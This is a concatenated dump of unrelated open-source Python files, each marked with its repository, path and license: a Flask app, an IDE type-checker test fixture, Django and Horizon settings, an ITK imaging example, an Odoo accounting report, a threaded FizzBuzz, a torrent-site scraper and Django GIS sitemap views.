# NOTE(review): recent Flask versions renamed `static_path` to
# `static_url_path`; confirm the pinned Flask release supports this.
app = Flask(__name__, static_path='/static')
@app.route("/")
def index():
    # Landing page.
    return render_template('index.html')
@app.route("/spider")
def spider(type=None):
    # Spider control page. NOTE(review): `type` is accepted but unused.
    return render_template('spider.html')
@app.route("/spider/getPlaylist", methods=['POST'])
def get_playlist():
    # NOTE(review): `pl` is created but never used and the posted gdType is
    # just echoed back -- this endpoint looks unfinished.
    pl = playlist.Playlist()
    return jsonify({"test": request.form["gdType"]})
@app.route("/stat")
def statistics():
    # Statistics dashboard page.
    return render_template('stat.html')
@app.route("/stat/playlist")
def stat_playlist():
    # JSON: playlist statistics from the database layer.
    return jsonify(pysql.stat_playlist())
@app.route("/stat/music")
def stat_music():
    # JSON: music statistics from the database layer.
    return jsonify(pysql.stat_music())
@app.route("/stat/dataCount")
def stat_data():
    # JSON: overall row counts.
    return jsonify(pysql.stat_data())
@app.route("/scan")
def scan():
    # Random-browse page.
    return render_template('scan.html')
@app.route("/scan/data")
def scan_data():
    # JSON: a random sample of stored records.
    return jsonify(pysql.random_data())
@app.route("/business")
def business():
    # Served as a raw file rather than through the template engine.
    return make_response(open('templates/business.html').read())
if __name__ == "__main__":
    # Development server with template auto-reload enabled.
    app.jinja_env.auto_reload = True
    app.config['TEMPLATES_AUTO_RELOAD'] = True
    app.run()
| mit |
asedunov/intellij-community | python/testData/inspections/PyTypeCheckerInspection/FunctionReturnTypePy3.py | 24 | 1200 | from typing import List, Optional, Union
def a(x: List[int]) -> List[str]:
return <warning descr="Expected type 'List[str]', got 'List[List[int]]' instead">[x]</warning>
def b(x: int) -> List[str]:
return <warning descr="Expected type 'List[str]', got 'List[int]' instead">[1,2]</warning>
def c() -> int:
return <warning descr="Expected type 'int', got 'str' instead">'abc'</warning>
def d(x: int) -> List[str]:
return [str(x)]
def e() -> int:
pass
def f() -> Optional[str]:
x = int(input())
if x > 0:
return <warning descr="Expected type 'Optional[str]', got 'int' instead">42</warning>
elif x == 0:
return 'abc'
else:
return
def g(x) -> int:
if x:
return <warning descr="Expected type 'int', got 'str' instead">'abc'</warning>
else:
return <warning descr="Expected type 'int', got 'dict' instead">{}</warning>
def h(x) -> int:
<warning descr="Expected type 'int', got 'None' instead">return</warning>
def i() -> Union[int, str]:
pass
def j(x) -> <warning descr="Expected to return 'Union[int, str]', got no return">Union[int, str]</warning>:
x = 42
def k() -> None:
if True:
pass | apache-2.0 |
aclifton/cpeg853-gem5 | src/python/m5/internal/__init__.py | 66 | 1575 | # Copyright (c) 2006 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Nathan Binkert
| bsd-3-clause |
394954369/horizon | horizon/test/settings.py | 1 | 5201 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import socket
import sys
import django
from django.utils import html_parser
import xstatic.main
import xstatic.pkg.jquery
from horizon.test import patches
# Patch django.utils.html_parser.HTMLParser as a workaround for bug 1273943
if django.get_version() == '1.4' and sys.version_info[:3] > (2, 7, 3):
    html_parser.HTMLParser.parse_starttag = patches.parse_starttag_patched

# Fail fast in the test suite: any blocking socket call times out after 1s.
socket.setdefaulttimeout(1)

LOGIN_URL = '/auth/login/'
LOGOUT_URL = '/auth/logout/'
LOGIN_REDIRECT_URL = '/'

ROOT_PATH = os.path.dirname(os.path.abspath(__file__))

DEBUG = False
TEMPLATE_DEBUG = DEBUG

TESTSERVER = 'http://testserver'

# Test-only key; never reuse outside these test settings.
SECRET_KEY = 'elj1IWiLoWHgcyYxFVLj7cM5rGOOxWl0'

USE_I18N = True
USE_L10N = True
USE_TZ = True

# sqlite backend keeps test runs self-contained (no external DB needed).
DATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3'}}

DEFAULT_EXCEPTION_REPORTER_FILTER = 'horizon.exceptions.HorizonReporterFilter'

INSTALLED_APPS = (
    'django.contrib.sessions',
    'django.contrib.staticfiles',
    'django.contrib.messages',
    'django.contrib.humanize',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django_nose',
    'compressor',
    'horizon',
    'horizon.test',
    'horizon.test.test_dashboards.cats',
    'horizon.test.test_dashboards.dogs'
)

MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.doc.XViewMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'horizon.middleware.HorizonMiddleware')

TEMPLATE_CONTEXT_PROCESSORS = (
    'django.core.context_processors.debug',
    'django.core.context_processors.i18n',
    'django.core.context_processors.request',
    'django.core.context_processors.media',
    'django.core.context_processors.static',
    'django.contrib.messages.context_processors.messages',
    'horizon.context_processors.horizon')

TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    'horizon.loaders.TemplateLoader'
)

STATIC_URL = '/static/'

MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'

ROOT_URLCONF = 'horizon.test.urls'
TEMPLATE_DIRS = (os.path.join(ROOT_PATH, 'tests', 'templates'),)

SITE_ID = 1
SITE_BRANDING = 'Horizon'

TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = ['--nocapture',
             '--nologcapture',
             '--exclude-dir=horizon/conf/',
             '--exclude-dir=horizon/test/customization',
             '--cover-package=horizon',
             '--cover-inclusive',
             '--all-modules']

EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'

SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies'
SESSION_COOKIE_HTTPONLY = True
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# Tests run over plain HTTP, so the session cookie cannot be marked Secure.
SESSION_COOKIE_SECURE = False

HORIZON_CONFIG = {
    'dashboards': ('cats', 'dogs'),
    'default_dashboard': 'cats',
    "password_validator": {
        "regex": '^.{8,18}$',
        "help_text": "Password must be between 8 and 18 characters."
    },
    'user_home': None,
    'help_url': "http://example.com",
}

COMPRESS_ENABLED = True
COMPRESS_OFFLINE = False
COMPRESS_ROOT = "/tmp/"
COMPRESS_PARSER = 'compressor.parser.HtmlParser'

STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    'compressor.finders.CompressorFinder',
)

STATICFILES_DIRS = (
    ('horizon/lib/jquery', xstatic.main.XStatic(xstatic.pkg.jquery).base_dir),
)

# Silence noisy loggers ('null') and surface only errors from horizon ('test').
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'null': {
            'level': 'DEBUG',
            'class': 'django.utils.log.NullHandler',
        },
        'test': {
            'level': 'ERROR',
            'class': 'logging.StreamHandler',
        }
    },
    'loggers': {
        'django.db.backends': {
            'handlers': ['null'],
            'propagate': False,
        },
        'horizon': {
            'handlers': ['test'],
            'propagate': False,
        },
        'nose.plugins.manager': {
            'handlers': ['null'],
            'propagate': False,
        },
        'selenium': {
            'handlers': ['null'],
            'propagate': False,
        }
    }
}
| apache-2.0 |
spinicist/ITK | Examples/Visualization/CannyEdgeDetectionImageFilterConnectVTKITK.py | 4 | 3820 | #==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================*/
# This file demonstrates how to connect VTK and ITK pipelines together
# in scripted languages with the new ConnectVTKITK wrapping functionality.
# Data is loaded in with VTK, processed with ITK and written back to disc
# with VTK.
#
# For this to work, you have to build InsightApplications/ConnectVTKITK
# as well.
#
# It also demonstrates the use of the python-specific itkPyCommand object.
#
# -- Charl P. Botha <cpbotha AT ieee.org>
import os
import sys
import InsightToolkit as itk
import ConnectVTKITKPython as CVIPy
import vtk
# VTK will read the PNG image for us
reader = vtk.vtkPNGReader()
reader.SetFileName("../../Testing/Data/Input/cthead1.png")

# it has to be a single component, itk::VTKImageImport doesn't support more
lum = vtk.vtkImageLuminance()
lum.SetInput(reader.GetOutput())

# let's cast the output to float
imageCast = vtk.vtkImageCast()
imageCast.SetOutputScalarTypeToFloat()
imageCast.SetInput(lum.GetOutput())

# the end-point of this VTK pipeline segment is a vtkImageExport
vtkExporter = vtk.vtkImageExport()
vtkExporter.SetInput(imageCast.GetOutput())

# it connects to the itk::VTKImageImport at the beginning of
# the subsequent ITK pipeline; two-dimensional float type
itkImporter = itk.itkVTKImageImportF2_New()

# Call the magic function that connects the two. This will only be
# available if you built ITK with ITK_CSWIG_CONNECTVTKITK set to ON.
CVIPy.ConnectVTKToITKF2(vtkExporter, itkImporter.GetPointer())

# perform a canny edge detection and rescale the output
canny = itk.itkCannyEdgeDetectionImageFilterF2F2_New()
rescaler = itk.itkRescaleIntensityImageFilterF2US2_New()
canny.SetInput(itkImporter.GetOutput())
rescaler.SetInput(canny.GetOutput())
rescaler.SetOutputMinimum(0)
rescaler.SetOutputMaximum(65535)

# this is to show off the new PyCommand functionality. :)
def progressEvent():
    # Python 2 print statement: reports canny filter progress as a percentage.
    print "%.0f%s done..." % (canny.GetProgress() * 100.0, '%')

pc = itk.itkPyCommand_New()
pc.SetCommandCallable(progressEvent)
canny.AddObserver(itk.itkProgressEvent(), pc.GetPointer())
# end of show-off

# this will form the end-point of the ITK pipeline segment
itkExporter = itk.itkVTKImageExportUS2_New()
itkExporter.SetInput(rescaler.GetOutput())

# the vtkImageImport will bring our data back into VTK-land
vtkImporter = vtk.vtkImageImport()

# do the magic connection call (once again: only available if you built
# ITK with ITK_CSWIG_CONNECTVTKITK set to ON)
CVIPy.ConnectITKUS2ToVTK(itkExporter, vtkImporter)

# finally write the image to disk using VTK
writer = vtk.vtkPNGWriter()
writer.SetFileName('./testout.png')
writer.SetInput(vtkImporter.GetOutput())

# before we call Write() on the writer, it is prudent to give
# our ITK pipeline an Update() call... this is not necessary
# for normal error-less operation, but ensures that exceptions
# thrown by ITK get through to us in the case of an error;
# This is because the VTK wrapping system does not support
# C++ exceptions.
rescaler.Update()

# write the file to disk...
writer.Write()

print "\n\nWrote testout.png to current directory."
| apache-2.0 |
savoirfairelinux/odoo | addons/account/report/account_balance.py | 183 | 6162 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
from common_report_header import common_report_header
class account_balance(report_sxw.rml_parse, common_report_header):
    """RML parser feeding the trial-balance report template."""
    _name = 'report.account.account.balance'

    def __init__(self, cr, uid, name, context=None):
        """Initialise accumulators and expose helper callables to the template."""
        super(account_balance, self).__init__(cr, uid, name, context=context)
        self.sum_debit = 0.00
        self.sum_credit = 0.00
        self.date_lst = []
        self.date_lst_string = ''
        # rows collected by lines(); shared state mutated by _process_child
        self.result_acc = []
        self.localcontext.update({
            'time': time,
            'lines': self.lines,
            'sum_debit': self._sum_debit,
            'sum_credit': self._sum_credit,
            'get_fiscalyear': self._get_fiscalyear,
            'get_filter': self._get_filter,
            'get_start_period': self.get_start_period,
            'get_end_period': self.get_end_period,
            'get_account': self._get_account,
            'get_journal': self._get_journal,
            'get_start_date': self._get_start_date,
            'get_end_date': self._get_end_date,
            'get_target_move': self._get_target_move,
        })
        self.context = context

    def set_context(self, objects, data, ids, report_type=None):
        """When launched from the menu, resolve the chosen chart of accounts
        into the record set the report will render."""
        new_ids = ids
        if (data['model'] == 'ir.ui.menu'):
            new_ids = 'chart_account_id' in data['form'] and [data['form']['chart_account_id']] or []
            objects = self.pool.get('account.account').browse(self.cr, self.uid, new_ids)
        return super(account_balance, self).set_context(objects, data, new_ids, report_type=report_type)

    def _get_account(self, data):
        """Return the company name when called on an account, else delegate."""
        if data['model'] == 'account.account':
            return self.pool.get('account.account').browse(self.cr, self.uid, data['form']['id']).company_id.name
        return super(account_balance, self)._get_account(data)

    def lines(self, form, ids=None, done=None):
        """Build the report rows: read every (consolidated) child account and
        walk the hierarchy depth-first, filtering per ``display_account``."""
        def _process_child(accounts, disp_acc, parent):
            # One row per account; recurses into child_id to keep tree order.
            account_rec = [acct for acct in accounts if acct['id'] == parent][0]
            currency_obj = self.pool.get('res.currency')
            acc_id = self.pool.get('account.account').browse(self.cr, self.uid, account_rec['id'])
            currency = acc_id.currency_id and acc_id.currency_id or acc_id.company_id.currency_id
            res = {
                'id': account_rec['id'],
                'type': account_rec['type'],
                'code': account_rec['code'],
                'name': account_rec['name'],
                'level': account_rec['level'],
                'debit': account_rec['debit'],
                'credit': account_rec['credit'],
                'balance': account_rec['balance'],
                'parent_id': account_rec['parent_id'],
                'bal_type': '',
            }
            self.sum_debit += account_rec['debit']
            self.sum_credit += account_rec['credit']
            # 'movement': keep accounts with any activity; 'not_zero': keep
            # accounts with a non-zero balance; otherwise keep everything.
            if disp_acc == 'movement':
                if not currency_obj.is_zero(self.cr, self.uid, currency, res['credit']) or not currency_obj.is_zero(self.cr, self.uid, currency, res['debit']) or not currency_obj.is_zero(self.cr, self.uid, currency, res['balance']):
                    self.result_acc.append(res)
            elif disp_acc == 'not_zero':
                if not currency_obj.is_zero(self.cr, self.uid, currency, res['balance']):
                    self.result_acc.append(res)
            else:
                self.result_acc.append(res)
            if account_rec['child_id']:
                for child in account_rec['child_id']:
                    _process_child(accounts, disp_acc, child)

        obj_account = self.pool.get('account.account')
        if not ids:
            ids = self.ids
        if not ids:
            return []
        if not done:
            done = {}
        # Propagate the wizard's period/date/state filters through the context
        # so debit/credit/balance are computed over the requested window.
        ctx = self.context.copy()
        ctx['fiscalyear'] = form['fiscalyear_id']
        if form['filter'] == 'filter_period':
            ctx['period_from'] = form['period_from']
            ctx['period_to'] = form['period_to']
        elif form['filter'] == 'filter_date':
            ctx['date_from'] = form['date_from']
            ctx['date_to'] = form['date_to']
        ctx['state'] = form['target_move']
        parents = ids
        child_ids = obj_account._get_children_and_consol(self.cr, self.uid, ids, ctx)
        if child_ids:
            ids = child_ids
        accounts = obj_account.read(self.cr, self.uid, ids, ['type', 'code', 'name', 'debit', 'credit', 'balance', 'parent_id', 'level', 'child_id'], ctx)
        for parent in parents:
            if parent in done:
                continue
            done[parent] = 1
            _process_child(accounts, form['display_account'], parent)
        return self.result_acc
class report_trialbalance(osv.AbstractModel):
    """Glue model binding the QWeb trial-balance report to its RML parser."""
    _name = 'report.account.report_trialbalance'
    _inherit = 'report.abstract_report'
    _template = 'account.report_trialbalance'
    _wrapped_report_class = account_balance
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
RagingTiger/CodingInterview | ch15/python/fizbuzz.py | 1 | 2138 | #!/usr/bin/env python
'''
Author: John D. Anderson
Email: jander43@vols.utk.edu
Problem Statement:
In the classic problem FizzBuzz, you are told to print the numbers from 1
to n. However, when the number is divisible by 3, print "Fizz". When it is
divisible by 5, print "Buzz." When it is divisble by 3 and 5, print "FizzBuzz".
In this problem, you are asked to do this in a multithreaded way. Implement a
multithreaded version of FizzBuzz with four threads. One thread checks for
divisibility of 3 and prints "Fizz". Another thread is responsible for
divisibility of 5 and prints "Buzz". A third thread is responsible for
divisibility of 3 and 5 and prints "FizzBuzz". A fourth thread does the
numbers.
Complexity: TODO
Usage: fizzbuzz <int>
'''
# libraries
import threading
# closure
def threading_closure(word):
    '''
    Build and return a zero-argument function that prints ``word`` from a
    freshly spawned thread.

    Reference:
        "Design Patterns: Elements of Reusable Object-Oriented Software",
        Adapter Pattern, pages: 325 - 330.
        "Intermediate Python Programming",
        Closures, pages: 83 - 85
    '''
    # closes over ``word``; runs inside the worker thread (Python 2 print)
    def thread_results():
        print word
    # closed over function
    def thread_execute():
        '''
        Function to print thread specific output.
        Note: start() is immediately followed by join(), so each call is
        effectively synchronous and output order stays deterministic.
        '''
        t = threading.Thread(target=thread_results)
        t.start()
        t.join()
    # return function
    return thread_execute
# function
def answer(n):
    '''Print the FizzBuzz sequence from 1 to n, one thread per output line.'''
    # pre-build one thread printer per fixed word
    words = ('fizz', 'buzz', 'fizzbuzz')
    printers = {word: threading_closure(word) for word in words}
    for value in range(1, n + 1):
        div3 = value % 3 == 0
        div5 = value % 5 == 0
        if div3 and div5:
            printers['fizzbuzz']()
        elif div3:
            printers['fizz']()
        elif div5:
            printers['buzz']()
        else:
            # plain numbers get a fresh one-shot thread printer
            threading_closure(value)()
# executable
if __name__ == '__main__':
    # import here so library users of this module never need docopt
    from docopt import docopt
    # parse command-line arguments against the module docstring usage section
    args = docopt(__doc__)
    # run
    answer(int(args['<int>']))
| mit |
varogami/bt-tools | oldmodules/kck.py | 1 | 8266 | #bt-tools - tools to interact with some bittorrent sites by commandline
#modified by qbittorrent ( http://www.qbittorrent.org/ ) search plugin
#qbittorrent author: Christophe Dumez (chris@qbittorrent.org)
#Copyright (C) 2015 varogami
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
# module config -- constants read by the host application
use_pwd = False  # presumably "site requires a login" -- not referenced in this module
m_pages = 4  # 11 - limit pages (max search-result pages to fetch)
# m_url = 'https://kickass.to'
m_url = 'https://kat.cr'
m_name = 'kickasstorrents'
m_shortname = 'KCK'
m_rss_light_download = True
# map of the tool's generic category names to the site's category labels
m_cats = {
    'all': '',
    'anime': 'Anime',
    'other': 'Other',
    'movie': 'Movies',
    'books': 'Books',
    'tv': 'TV',
    'music': 'Music',
    'xxx': 'XXX',
    'games': 'Games',
    'apps': 'Applications'}
m_default_cat = 'all'
m_rss_filter = None  # None - for not set filter - filter rss feed
import json, urllib, datetime, utils, httplib2
from BeautifulSoup import BeautifulSoup
class Item:
    """One torrent entry (search result or RSS item) scraped from the site."""

    def __init__(self, name, weblink, date, size):
        self.name = name
        self.date = self._convert_date(date)
        self.link = weblink
        self.size = size
        self.id = self._get_id(weblink)
        # the fields below are filled later by Data.search / get_detail_data
        self.magnet = None
        self.files = None
        self.seed = None
        self.leech = None
        self.compl = None
        self.hashvalue = None
        # insertion timestamp (when this Item object was created)
        self.idate = datetime.datetime.utcnow().strftime("%a, %d %b %Y %H:%M:%S UTC")
        self.torrent_link = None
        self.torrent_link_alt1 = None
        self.torrent_link_alt2 = None
        self.descr = None

    def _get_id(self, link):
        """Extract the numeric torrent id from a detail-page URL.

        Scans backwards (after stripping ".html") to the first ``t`` and
        returns everything past it.
        NOTE(review): assumes detail links end in "...t<ID>.html"; a URL
        without a 't' would walk off the string -- confirm with real links.
        """
        string = link.replace(".html", "")
        count = len(string) - 1
        char = "a"
        while not char == "t":
            char = string[count]
            count = count - 1
        count = count + 2
        id = string[count:]
        return id

    def _convert_date(self, date):
        """Normalise a feed date of the form
        '<weekday> <day> <Mon> <year> <hh:mm:ss> <tz>' to
        '%a, %d %b %Y %H:%M:%S GMT'.

        NOTE(review): the trailing timezone field is parsed but discarded, so
        non-UTC inputs are relabelled GMT without conversion -- confirm the
        feeds are UTC.
        """
        months = {"Jan": 1, "Feb": 2, "Mar": 3, "Apr": 4, "May": 5, "Jun": 6, "Jul": 7, "Aug": 8, "Sep": 9, "Oct": 10, "Nov": 11, "Dec": 12}
        week, day, month_w, year, time, gmt = date.split(" ")
        month = months[month_w]
        hour, minutes, second = time.split(":")
        newdate = datetime.datetime(int(year), int(month), int(day), int(hour), int(minutes), int(second))
        finaldate = newdate.strftime("%a, %d %b %Y %H:%M:%S GMT")
        return finaldate
class Data:
    """Scraper/search driver for the site; accumulates Item objects in self.list."""

    def __init__(self, debug=False):
        # copy the module-level config into instance state
        self.pages = m_pages
        self.list = []
        self.url = m_url
        self.name = m_name
        self.shortname = m_shortname
        self.cats = m_cats
        self.cat = m_default_cat
        self.filter = m_rss_filter
        self.debug = debug
        self.rss_light_download = m_rss_light_download

    def makeVoidItem(self):
        """Return a placeholder Item with display fields blanked out."""
        void = Item("void", "https://void/void-tvoid.html", "Friday 1 Jun 1970 00:00:00 +0000", "0")
        void.date = None
        void.size = None
        void.name = None
        return void

    def search(self, what, cat='all'):
        """Query the site's JSON search API page by page and append matching
        results to self.list (optionally restricted to one category).

        NOTE(review): ``urllib.HTTPError`` / ``urllib.URLError`` -- in
        Python 2 those classes live in urllib2, not urllib, so if urlopen
        fails these handlers themselves raise AttributeError. Confirm which
        urllib module was intended.
        """
        self.cat = cat
        ret = []  # NOTE(review): never used -- left as-is pending confirmation
        i = 1
        while True and i < self.pages:
            results = []
            pattern = urllib.urlencode(dict(q=what))
            try:
                u = urllib.urlopen(self.url + '/json.php?%s&page=%d' % (pattern, i))  # was urllib2
                json_data = u.read()
                try:
                    json_dict = json.loads(json_data)
                except:
                    # unparsable page: skip it and try the next one
                    i += 1
                    continue
                if int(json_dict['total_results']) <= 0:
                    return
                results = json_dict['list']
                for r in results:
                    try:
                        if cat != 'all' and self.cats[cat] != r['category']:
                            continue
                        name = r['title']
                        size = str(r['size'])
                        seeds = r['seeds']
                        leech = r['leechs']
                        link = r['torrentLink']
                        desc_link = r['link']
                        date = r['pubDate']
                        files = r['files']  # to use in the future
                        hash = r['hash']
                        newitem = Item(name, desc_link, date, str(size))
                        newitem.torrent_link = link
                        newitem.seed = str(seeds)
                        newitem.leech = str(leech)
                        newitem.hashvalue = hash
                        newitem.magnet = utils.get_mag_by_hash(hash)
                        newitem.torrent_link_alt1 = utils.get_url_by_hash(hash, utils.link_torcache)
                        newitem.torrent_link_alt2 = utils.get_url_by_hash(hash, utils.link_zoink)
                        self.list.append(newitem)
                    except:
                        # best-effort: a malformed entry is silently dropped
                        pass
            except urllib.HTTPError, e:
                print self.shortname + " http error: " + str(e.code)
            except urllib.URLError, e:
                print self.shortname + " url error: " + str(e.args)
            i += 1

    def _get_rss(self, code):
        """Parse raw RSS XML and append filter-matching Items to self.list.

        NOTE(review): entries are appended only when self.filter is set; with
        the default filter of None every entry is dropped -- confirm intent.
        """
        import feedparser
        parsedRss = feedparser.parse(code)
        for i in parsedRss.entries:
            name = i['title']
            link = i['guid']
            date = i['published']
            torrent_link = i.enclosures[0]['href']
            size = i.enclosures[0]['length']
            magnet = i['torrent_magneturi']
            hashvalue = i['torrent_infohash']
            if not self.filter == None:
                if utils.search_words_case_insens(self.filter, name):
                    newitem = Item(name, link, date, str(size))
                    newitem.torrent_link = torrent_link
                    newitem.hashvalue = hashvalue
                    newitem.magnet = magnet
                    self.list.append(newitem)

    def getFeed(self, cat):
        """Download the category RSS feed and hand it to _get_rss.

        NOTE(review): same urllib vs urllib2 exception-class concern as in
        search(); the final ``except Exception`` would mask it here.
        """
        self.cat = cat
        try:
            u = urllib.urlopen(self.url + '/' + self.cats[cat].lower() + '/?rss=1')
            data = u.read()
            self._get_rss(data)
        except urllib.HTTPError, e:
            print self.shortname + " http error: " + str(e.code)
        except urllib.URLError, e:
            print self.shortname + " url error: " + str(e.args)
        except Exception, e:
            print self.shortname + " error: " + str(e)

    def get_detail_data(self, item_obj):
        """Scrape the torrent detail page to fill magnet, seed/leech counts,
        size and completed-downloads for *item_obj* (best-effort)."""
        try:
            result = httplib2.Http()
            resp, content = result.request(item_obj.link, 'GET')
            parsedDetails = BeautifulSoup(content, convertEntities=BeautifulSoup.HTML_ENTITIES)
            item_obj.magnet = parsedDetails.find('a', {'title': 'Magnet link'}).get('href')
            item_obj.leech = parsedDetails.find('div', {'class': 'widgetLeech'}).find('strong').getText()
            item_obj.seed = parsedDetails.find('div', {'class': 'widgetSeed'}).find('strong').getText()
            size = parsedDetails.find('div', {'class': 'widgetSize'}).find('strong').getText()
            # assumes the size reads like "700MB": re-insert a space before
            # the two-character unit so utils.getBytes can parse it -- confirm
            cut = len(size) - 2
            size2 = size[:cut] + " " + size[cut:]
            item_obj.size = utils.getBytes(size2)
            item_obj.compl = parsedDetails.find('div', {'class': 'font11px lightgrey line160perc'}).getText().split("Downloaded ")[1].split(" times.")[0].replace(",", "")
            # item_obj.descr = parsedDetails.find('div',{'class':'dataList'})
        except Exception, e:
            print self.shortname + " error: " + str(e)

    def getCategory(self, type):
        """build data object of single category by website page (only 1 page)"""
        pass

    def get_torrent_file(self, item):
        """Download the .torrent file for *item*.

        NOTE(review): ``download_path`` is not defined anywhere in this
        module; as written this raises NameError unless the host application
        injects it as a module global -- confirm.
        """
        utils.get_torrent_file(item, self.shortname, download_path)
| gpl-3.0 |
x303597316/hue | desktop/core/ext-py/Django-1.6.10/django/contrib/gis/sitemaps/views.py | 114 | 4439 | from __future__ import unicode_literals
from django.http import HttpResponse, Http404
from django.template import loader
from django.contrib.sites.models import get_current_site
from django.core import urlresolvers
from django.core.paginator import EmptyPage, PageNotAnInteger
from django.contrib.gis.db.models.fields import GeometryField
from django.db import connections, DEFAULT_DB_ALIAS
from django.db.models import get_model
from django.utils import six
from django.utils.translation import ugettext as _
from django.contrib.gis.shortcuts import render_to_kml, render_to_kmz
def index(request, sitemaps):
    """
    This view generates a sitemap index that uses the proper view
    for resolving geographic section sitemap URLs.

    ``sitemaps`` maps section names to Sitemap classes or instances.
    """
    current_site = get_current_site(request)
    sites = []
    protocol = 'https' if request.is_secure() else 'http'
    for section, site in sitemaps.items():
        # entries may be Sitemap classes or instances; instantiate on demand
        if callable(site):
            pages = site().paginator.num_pages
        else:
            pages = site.paginator.num_pages
        sitemap_url = urlresolvers.reverse('django.contrib.gis.sitemaps.views.sitemap', kwargs={'section': section})
        sites.append('%s://%s%s' % (protocol, current_site.domain, sitemap_url))
        # extra pages of a section are addressed via the ?p=<n> query argument
        if pages > 1:
            for page in range(2, pages + 1):
                sites.append('%s://%s%s?p=%s' % (protocol, current_site.domain, sitemap_url, page))
    xml = loader.render_to_string('sitemap_index.xml', {'sitemaps': sites})
    return HttpResponse(xml, content_type='application/xml')
def sitemap(request, sitemaps, section=None):
    """
    This view generates a sitemap with additional geographic
    elements defined by Google.

    Raises Http404 for an unknown section or an out-of-range/non-integer
    ``p`` page parameter.
    """
    maps, urls = [], []
    if section is not None:
        if section not in sitemaps:
            raise Http404(_("No sitemap available for section: %r") % section)
        maps.append(sitemaps[section])
    else:
        maps = list(six.itervalues(sitemaps))
    page = request.GET.get("p", 1)
    current_site = get_current_site(request)
    for site in maps:
        try:
            # entries may be Sitemap classes or instances
            if callable(site):
                urls.extend(site().get_urls(page=page, site=current_site))
            else:
                urls.extend(site.get_urls(page=page, site=current_site))
        except EmptyPage:
            raise Http404(_("Page %s empty") % page)
        except PageNotAnInteger:
            raise Http404(_("No page '%s'") % page)
    xml = loader.render_to_string('gis/sitemaps/geo_sitemap.xml', {'urlset': urls})
    return HttpResponse(xml, content_type='application/xml')
